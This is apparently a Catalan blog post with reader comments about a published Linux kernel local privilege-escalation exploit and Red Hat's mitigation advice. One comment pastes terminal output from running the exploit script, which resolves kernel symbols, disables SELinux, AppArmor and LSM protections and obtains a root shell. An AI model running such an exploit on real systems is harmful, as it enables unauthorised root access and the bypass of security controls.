Vulnerabilitat al nucli de Linux, que permet augmentar els privilegis
[H-Security] Root exploit for Linux kernel published publica el codi d'un exploit que permet a un usuari local d'un sistema Linux aconseguir privilegis de superusuari (codi font complet). Es basa en aquesta vulnerabilitat, present a totes les versions del nucli de Linux publicades des del 2001.
RedHat ha publicat uns consells per mitigar l'abast de la vulnerabilitat.
La vulnerabilitat només es pot executar localment, però hi ha la possibilitat que el codi malèvol que s'aprofita del problema estigui dins d'una pàgina web que, en visitar-la, executi codi amb privilegis de root.
Entrades aleatòries
Carregant...
Què fort!!! A veure quan tarden les distros a publicar els nuclis patchejats.
andreu@si2-ubuntu:~/wunderbar_emporium$ ./wunderbar_emporium.sh
[+] MAPPED ZERO PAGE!
[+] Resolved selinux_enforcing to 0xc08653bc
[+] Resolved selinux_enabled to 0xc08653b8
[+] Resolved apparmor_enabled to 0xc06a0d84
[+] Resolved apparmor_complain to 0xc0866fb8
[+] Resolved apparmor_audit to 0xc0866fc0
[+] Resolved apparmor_logsyscall to 0xc0866fc4
[+] Resolved security_ops to 0xc0863b60
[+] Resolved default_security_ops to 0xc069fb40
[+] Resolved sel_read_enforce to 0xc0293a70
[+] Resolved audit_enabled to 0xc0822564
[+] got ring0!
[+] detected 2.6 style 8k stacks
sh: mplayer: not found
[+] Disabled security of : LSM
[+] Got root!
# ls
exploit exploit.c pwnkernel2.c pwnkernel.c tzameti.avi wunderbar_emporium.sh
# whoami
root
Mola com intenta llençar aquesta seqüència.. de quina peli és?